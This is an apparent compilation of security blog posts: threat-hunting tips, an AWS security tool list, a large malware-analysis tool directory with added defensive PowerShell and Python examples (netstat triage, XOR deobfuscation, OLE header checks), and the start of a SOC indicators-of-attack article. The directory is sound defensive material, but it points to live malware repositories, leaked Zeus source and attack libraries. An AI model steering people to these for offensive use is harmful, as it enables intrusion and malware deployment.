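Going through raw netstat output by eye is where most people give up, so here is the filtering step done in PowerShell. This is an added example, not code from the original post: it parses "netstat -ano" lines, keeps only ESTABLISHED connections whose remote address is outside the private and loopback ranges, and attaches the owning process name, which is exactly the short list to check against VirusTotal, OTX and similar sources. The netstat output and the PID-to-name map below are constructed for the example (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges); on a live host you pass the real output and let the function ask Get-Process.

```powershell
# Added example; it is not from the original article. It parses "netstat -ano" output,
# keeps the ESTABLISHED connections whose remote address is a public IP, and attaches the
# owning process name, giving you the short list to check against VirusTotal, OTX and the
# other IOC sources mentioned above. The output below is constructed for this example
# (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges, not real peers).

$SampleNetstat = @'

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1032
  TCP    127.0.0.1:49700        127.0.0.1:49701        ESTABLISHED     4812
  TCP    192.168.1.20:52011     203.0.113.9:443        ESTABLISHED     4812
  TCP    192.168.1.20:52014     198.51.100.77:8080     ESTABLISHED     7324
  TCP    192.168.1.20:445       192.168.1.15:51044     ESTABLISHED     4
  TCP    [::1]:49710            [::1]:49711            ESTABLISHED     4812
  UDP    0.0.0.0:5353           *:*                                    2200
'@ -split "`r?`n"

# Constructed PID-to-name map so the example runs without a live system; on a real host
# leave the parameter out and the function asks Get-Process instead.
$SampleProcessNames = @{ 4812 = 'msedge'; 7324 = 'updater' }

function Test-PrivateIPv4 {
    param([string]$Address)
    $octets = $Address.Split('.')
    # IPv6 literals such as [::1] and wildcards are treated as local here.
    if ($octets.Count -ne 4) { return $true }
    $a = [int]$octets[0]; $b = [int]$octets[1]
    return ($a -eq 0) -or ($a -eq 10) -or ($a -eq 127) -or
           ($a -eq 169 -and $b -eq 254) -or
           ($a -eq 172 -and $b -ge 16 -and $b -le 31) -or
           ($a -eq 192 -and $b -eq 168)
}

function ConvertFrom-NetstatLine {
    param([string]$Line)
    # Only TCP rows carry a state; UDP rows and the header are skipped.
    if ($Line -match '^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$') {
        [pscustomobject]@{
            LocalAddress  = $Matches[1]; LocalPort  = [int]$Matches[2]
            RemoteAddress = $Matches[3]; RemotePort = [int]$Matches[4]
            State         = $Matches[5]; PID        = [int]$Matches[6]
        }
    }
}

function Get-ExternalConnection {
    param([string[]]$Lines, [hashtable]$ProcessNames = @{})
    $Lines | ForEach-Object { ConvertFrom-NetstatLine -Line $_ } |
        Where-Object { $_.State -eq 'ESTABLISHED' -and -not (Test-PrivateIPv4 -Address $_.RemoteAddress) } |
        ForEach-Object {
            $name = $ProcessNames[$_.PID]
            if (-not $name) { $name = (Get-Process -Id $_.PID -ErrorAction SilentlyContinue).ProcessName }
            [pscustomobject]@{
                PID       = $_.PID
                Process   = $name
                Remote    = "$($_.RemoteAddress):$($_.RemotePort)"
                LocalPort = $_.LocalPort
            }
        }
}

# Live use: Get-ExternalConnection -Lines (netstat -ano)
Get-ExternalConnection -Lines $SampleNetstat -ProcessNames $SampleProcessNames | Format-Table -AutoSize
```

On the sample input only two rows survive: the browser's connection to 203.0.113.9:443 and an "updater" process talking to 198.51.100.77:8080. The second is the kind of line worth a reputation lookup before deciding whether to end the task, and the process name matters as much as the address: PID 4 (System) handling SMB on port 445 is normal and should never be killed.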

Threat Hunting Malware

Hunting for malicious programs is different from running an anti-virus, because the malware does not need to be quarantined or removed immediately. Running an AV may notify the malware's creator that the program planted on the host has been found and deleted, warning the adversary that it has been detected.

"Triaging" an advanced persistent threat (APT) is crucial for hunting the threat actor and tracing their whereabouts.

A simple IOC scanner called LOKI is effective for playing that detective role, Sherlock Holmes style.

This slick tool can be downloaded here: https://github.com/Neo23x0/Loki/releases

The tool gives the full directory path of both suspicious and malicious files, based on IOCs that most AVs do not have yet; you can then delete them manually or opt for further malware analysis, which is an interesting hobby.

Threat Hunting Rogue Wi-Fi

In my few speaking engagements, I always mention that "free" is not always good, as it can be a conduit for social engineering attacks such as Man-in-the-Middle (MITM) or eavesdropping techniques that steal sensitive information.

It is best to have a healthy paranoia and run tools like my example here to catch rogue access points (APs) in public places.

A handy, user-friendly rogue AP detector called CHELLAM is very useful for staying safe in the wild, where the adversary is just one click away from baiting their targets, and one of those could be you or your family.


There are so many tools available for download in the wild, and it is everyone's discretion which tool is effective for them. As mentioned in my other blogs, the mindset of a hunter is the most important thing, and that cannot be acquired in classroom training or through a Ph.D. degree. Again, security is everybody's responsibility, and either you are part of the solution or just another brick in the wall.

Original Post: https://www.peerlyst.com/posts/threat-hunting-for-non-hunters-mike-art-rebultan-mit-ceh-ecsa

The AWS Security Open Source Toolkit


I love AWS. I love Open Source. I love Security. So I’ve been bringing together a compilation of the best tools available to monitor, audit, train up on and find exposures in your AWS accounts.

You can find the GitHub repo here: https://github.com/stuhirst/awssecurity/blob/master/arsenal.md

Please add to that if you wish!


Generate a report of all S3 buckets for an account: https://github.com/bear/s3scan

Find open S3 buckets: https://github.com/sa7mon/S3Scanner

Generate Network Diagrams: https://github.com/duo-labs/cloudmapper

Cred Scanner: https://github.com/disruptops/cred_scanner


Disable Access Keys after X days: https://github.com/te-papa/aws-key-disabler

Secrets Management: https://github.com/awslabs/git-secrets

Least Privilege: https://github.com/Netflix/repokid

Resource Counter: https://github.com/disruptops/resource-counter

IAM Access Advisor: https://github.com/Netflix-Skunkworks/aardvark


Scout2: https://github.com/nccgroup/Scout2

Prowler: https://github.com/toniblyx/prowler

Policy changes & Insecure config: https://github.com/Netflix/security_monkey

Policy & Encryption: https://github.com/capitalone/cloud-custodian




AWS Attack Library: https://github.com/carnal0wnage/weirdAAL/wiki

Thanks to all the awesome open-sourcers who make these possible!

Original Post: https://medium.com/@StuHirstInfoSec/the-aws-security-open-source-toolkit-eb3e92566eaf

Most Important Security Tools and Resources For Security Researcher, Malware Analyst, Reverse Engineer

Important Tools and Resources

Security professionals always need to learn many tools, techniques and concepts to analyze sophisticated threats and current cyber attacks.

Here we are going to see some of the most important tools, books and resources mainly used for malware analysis and reverse engineering.

Hex Editors

A hex editor (or binary file editor or byte editor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.


A disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline – A scalable distributed file analysis framework.
  • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • Detect-It-Easy – A program for determining types of files.
  • ExifTool – Read, write and edit file metadata.
  • File Scanning Framework – Modular, recursive file scanning solution.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework.
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • totalhash.py – Python script for easy searching of the TotalHash.cymru.com database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives.

Dynamic Binary Instrumentation

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding


Reverse XOR and other code obfuscation methods:

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker – A generic hidden code extractor for Windows malware.
  • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.
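
Several of the tools above do one job: guess a single-byte or repeating XOR key and strip the obfuscation layer. The block below is an added example written for this page, not code from any of those tools, showing the underlying technique in Python: brute-force each key position against an English-likeness score, then pick the key length whose recovered plaintext scores best, preferring the shortest length (a key repeated twice scores identically to the key itself). The letter-frequency table, the penalty for non-printable bytes and the obfuscated sample blob are constructed assumptions; the approach only works when the hidden data is mostly readable text, which is exactly the case these tools are built for.

```python
"""Recover a repeating-key XOR obfuscation layer from a blob of bytes.

Added example (not code from the tools listed above). It assumes the hidden
plaintext is mostly English/ASCII text, which is what the frequency score rewards.
"""
from itertools import cycle

# Approximate English letter frequencies (percent) plus space; used to rank candidates.
ENGLISH_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0, "h": 6.1,
    "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7, "o": 7.5, "p": 1.9,
    "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8, "v": 0.98, "w": 2.4, "x": 0.15,
    "y": 2.0, "z": 0.074, " ": 13.0,
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def score_plaintext(candidate: bytes) -> float:
    """Higher means more English-like. Control and non-ASCII bytes are penalised."""
    score = 0.0
    for b in candidate:
        c = chr(b).lower()
        if c in ENGLISH_FREQ:
            score += ENGLISH_FREQ[c]
        elif b in (0x09, 0x0A, 0x0D) or 0x20 <= b <= 0x7E:
            continue  # other printable ASCII (digits, punctuation) is neutral
        else:
            score -= 20.0
    return score


def best_single_byte_key(column: bytes) -> int:
    """Brute-force all 256 single-byte keys for one key position."""
    return max(range(256), key=lambda k: score_plaintext(xor_bytes(column, bytes([k]))))


def recover_key(data: bytes, key_len: int) -> bytes:
    """Split the blob into key_len interleaved columns and solve each one independently."""
    return bytes(best_single_byte_key(data[i::key_len]) for i in range(key_len))


def guess_key_length(data: bytes, max_len: int = 8) -> int:
    """Try every length up to max_len and keep the best-scoring plaintext.
    Equal scores keep the shorter key, so multiples of the true length lose."""
    best_len, best_score = 1, float("-inf")
    for key_len in range(1, max_len + 1):
        s = score_plaintext(xor_bytes(data, recover_key(data, key_len)))
        if s > best_score + 1e-9:
            best_len, best_score = key_len, s
    return best_len


def deobfuscate(data: bytes, max_len: int = 8):
    """Return (key, plaintext) for a blob believed to be repeating-key XOR of text."""
    key_len = guess_key_length(data, max_len)
    key = recover_key(data, key_len)
    return key, xor_bytes(data, key)


# Constructed sample: an English configuration string obfuscated with a 3-byte key.
SAMPLE_PLAINTEXT = (b"This sample configuration string was constructed for the example. "
                    b"It stands in for the kind of text a loader hides with a short XOR key, "
                    b"such as a callback address or a mutex name. The scorer rewards English.")
SAMPLE_KEY = b"\x5A\x13\xC7"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    key, plain = deobfuscate(SAMPLE_BLOB)
    print("key:", key.hex(), "plaintext:", plain.decode())
```

Real samples often carry a short XOR layer over binary data rather than text; in that case the score function is the part to replace (for instance with a check for a known header such as the PE `MZ` bytes), while the column-splitting and length-guessing logic stays the same.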


In this list we can see disassemblers, debuggers, and other static and dynamic analysis tools.

  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect – Identifies and extracts information from bots and other malware.
  • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary ninja – A reversing engineering platform that is an alternative to IDA.
  • Binwalk – Firmware analysis tool.
  • Bokken – GUI for Pyew and Radare. (mirror)
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper – The macOS and Linux Disassembler.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma – Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer – Advanced task manager for Windows.
  • Process Hacker – Tool that monitors system resources.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • PSTools – Windows command-line tools that help manage and investigate live systems.
  • Pyew – Python tool for malware analysis.
  • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD – QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 – Reverse engineering framework, with debugger support.
  • RegShot – Registry compare utility that compares snapshots.
  • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
  • strace – Dynamic analysis for Linux executables.
  • Triton – A dynamic binary analysis (DBA) framework.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
  • X64dbg – An open-source x64/x32 debugger for Windows.

Binary Format and  Binary Analysis

The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.
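
Because that container sits underneath so many document formats handed to analysts, the first triage step is usually to read its 512-byte header and check that the fields agree with each other. The following parser is an added example written for this page, not code from any tool listed here; the field offsets follow the published MS-CFB header layout, and the sample headers it builds (version 3, version 4, and one with a wrong byte-order mark) are constructed so the checks can run without a real document.

```python
"""Parse and sanity-check the 512-byte header of a Compound File Binary (OLE2) container.

Added example, not code from any of the tools listed on this page. Field offsets
follow the published MS-CFB header layout; the sample headers are constructed.
"""
import struct

CFB_SIGNATURE = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN = 0xFFFFFFFE   # sector number meaning "end of chain"
FREESECT = 0xFFFFFFFF     # unused DIFAT slot
HEADER_SIZE = 512


def parse_cfb_header(blob: bytes) -> dict:
    """Decode the fixed header fields; raises ValueError if this is not a CFB file."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("CFB header must be 512 bytes")
    if blob[:8] != CFB_SIGNATURE:
        raise ValueError("missing CFB signature")
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<5H", blob, 24)
    (n_dir_sectors, n_fat_sectors, first_dir, transaction_sig, mini_cutoff,
     first_minifat, n_minifat, first_difat, n_difat) = struct.unpack_from("<9I", blob, 40)
    difat = struct.unpack_from("<109I", blob, 76)   # first 109 FAT sector locations
    return {
        "minor_version": minor, "major_version": major, "byte_order": byte_order,
        "sector_shift": sector_shift, "sector_size": 1 << sector_shift,
        "mini_sector_shift": mini_shift, "mini_sector_size": 1 << mini_shift,
        "num_dir_sectors": n_dir_sectors, "num_fat_sectors": n_fat_sectors,
        "first_directory_sector": first_dir, "transaction_signature": transaction_sig,
        "mini_stream_cutoff": mini_cutoff, "first_minifat_sector": first_minifat,
        "num_minifat_sectors": n_minifat, "first_difat_sector": first_difat,
        "num_difat_sectors": n_difat,
        "fat_sectors": [s for s in difat if s != FREESECT],  # slots actually in use
    }


def sector_offset(header: dict, sector_number: int) -> int:
    """File offset of a regular sector: sector 0 starts right after the header."""
    return (sector_number + 1) * header["sector_size"]


def sanity_check(header: dict) -> list:
    """Return human-readable warnings for field combinations the format does not allow.
    Parsers that trust these fields blindly are what malformed documents aim at."""
    warnings = []
    if header["byte_order"] != 0xFFFE:
        warnings.append("byte order field is not 0xFFFE (little-endian)")
    major = header["major_version"]
    if major not in (3, 4):
        warnings.append(f"unknown major version {major}")
    expected_shift = {3: 9, 4: 12}.get(major)
    if expected_shift is not None and header["sector_shift"] != expected_shift:
        warnings.append(f"sector shift {header['sector_shift']} does not match version {major}")
    if header["mini_sector_shift"] != 6:
        warnings.append("mini sector shift is not 6 (64-byte mini sectors)")
    if header["mini_stream_cutoff"] != 4096:
        warnings.append("mini stream cutoff is not 4096")
    if major == 3 and header["num_dir_sectors"] != 0:
        warnings.append("version 3 files must report 0 directory sectors")
    if len(header["fat_sectors"]) != min(header["num_fat_sectors"], 109):
        warnings.append("DIFAT entry count disagrees with the number of FAT sectors")
    return warnings


def build_sample_header(major=3, fat_sectors=(0,), first_dir=1, byte_order=0xFFFE) -> bytes:
    """Constructed minimal header (no body) for exercising the checks above."""
    sector_shift = 9 if major == 3 else 12
    hdr = bytearray(HEADER_SIZE)
    hdr[0:8] = CFB_SIGNATURE
    struct.pack_into("<5H", hdr, 24, 0x003E, major, byte_order, sector_shift, 6)
    struct.pack_into("<9I", hdr, 40, 0, len(fat_sectors), first_dir, 0, 4096,
                     ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    difat = list(fat_sectors) + [FREESECT] * (109 - len(fat_sectors))
    struct.pack_into("<109I", hdr, 76, *difat)
    return bytes(hdr)


if __name__ == "__main__":
    sample = parse_cfb_header(build_sample_header())
    print("sector size:", sample["sector_size"], "warnings:", sanity_check(sample))
```

Walking the FAT and directory chains from here is what full tools such as the OLE parsers in the document analysis section do; the header check alone already catches many hand-crafted files before any stream is read.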


A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

Online Scanners and Sandboxes

The following tools are web-based multi-AV scanners and malware sandboxes for automated analysis.

  • anlyz.io – Online sandbox.
  • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar – Malware.lu online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • detux – A sandbox developed to do traffic analysis of Linux malware and capture IOCs.
  • DRAKVUF – Dynamic malware analysis system.
  • firmware.re – Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox – Deep malware analysis with Joe Sandbox.
  • Jotti – Free online multi-AV scanner.
  • Limon – Sandbox for Analyzing Linux Malware.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • malsub – A Python RESTful API framework for online malware and URL analysis services.
  • Malware config – Extract, decode and display online the configuration settings from common malware.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • Metadefender.com – Scan a file, hash or IP address for malware (free).
  • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • ProcDot – A graphical malware analysis tool kit.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • Sand droid – Automatic and complete Android application analysis system.
  • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
  • VirusTotal – Free online analysis of malware samples and URLs.
  • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • evolve – Web interface for the Volatility Memory Forensics Framework.
  • FindAES – Find AES encryption keys in memory.
  • inVtero.net – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • VolUtility – Web Interface for Volatility Memory Analysis framework.
  • WDBGARK – WinDBG Anti-RootKit Extension.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – Open Source Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse – Store, tag, and search malware.
  • Polichombr – A malware analysis platform designed to help analysts reverse malware collaboratively.
  • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper – A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scraped from malicious sites.
  • MalwareDB – Malware samples repository.
  • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities.
  • theZoo – Live malware samples for analysts.
  • Tracker h3x – Aggregator for malware corpus trackers and malicious download sites.
  • ViruSign – Malware database of samples detected by many anti-malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • VX Vault – Active collection of malware samples.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Domain Analysis

Inspect domains and IP addresses.

  • badips.com – Community based IP blacklist service.
  • boomerang – A tool designed for consistent and safe capture of off network web resources.
  • Cymon – Threat intelligence tracker, with IP/domain/hash search.
  • Desenmascara.me – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
  • mailchecker – Cross-language temporary email detection library.
  • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery – Free URL Scanner.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • ZScalar Zulu – Zulu URL Risk Analyzer.


Most Important Reverse Engineering Books

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • JS Deobfuscator – Deobfuscate simple JavaScript that uses eval or document.write to conceal its code.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • Fileintel – Pull intelligence per file hash.
  • Hostintel – Pull intelligence per host.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe – A Python OpenIOC editor.
  • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources


This list was created with the help of the following awesome people.

Original Post: https://gbhackers.com/most-important-tools/

Indicator Of Attack(IoA’s) And Activities – SOC/SIEM – A Detailed Explanation


What is an Indicator of Attack (IOA)

IoAs are events that could reveal an active attack before indicators of compromise become visible. Using IoAs provides a way to shift from reactive cleanup/recovery to a proactive mode, where attackers are disrupted and blocked before they achieve their goal, such as data theft, ransomware, exploitation, etc.

IOAs focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack. Just like AV signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, next-generation security solutions are moving to an IOA-based approach.

10 Indicators of attack (IoAs)

The following common attack activities can be used, individually or in combination, to diagnose active attacks:

1) Internal hosts with bad destinations

Internal hosts communicating with known bad destinations or to a foreign country where you don’t conduct business.


An example HP ArcSight dashboard showing client hosts communicating with feeds (IP, domain, URL) from the “ransomwaretracker.abuse.ch” website.


Example of Global Threat Intelligence from McAfee

2) Internal hosts with non-standard ports

Internal hosts communicating to external hosts using non-standard ports or protocol/port mismatches, such as sending command shells (SSH) rather than HTTP or HTTPS traffic over ports 80 and 443, the default web ports.


Example of an internal host using 21 (FTP), 445 (SMB), 137 (NETBIOS-NS) and 135 (RPC) to the Internet.

3) Public Servers/DMZ to Internal hosts

Public-facing servers or demilitarized zone (DMZ) hosts communicating to internal hosts. This allows leapfrogging from the outside to the inside and back, permitting data exfiltration and remote access to assets via RDP (Remote Desktop Protocol), Radmin or SSH.


An example of a report that monitors the top 10 traffic flows from the “DMZ” zone to the “Internal/Client” zone.

From this report, the security analyst should investigate the highlighted servers that are communicating to internal hosts via RDP (TCP/3389) and SSH (TCP/22).

4) Off-hour Malware Detection

Alerts that occur outside standard business operating hours (at night or on weekends) could signal a compromised host.


Example of IPS alerts during non-working time (a holiday).

5) Network scans by internal hosts

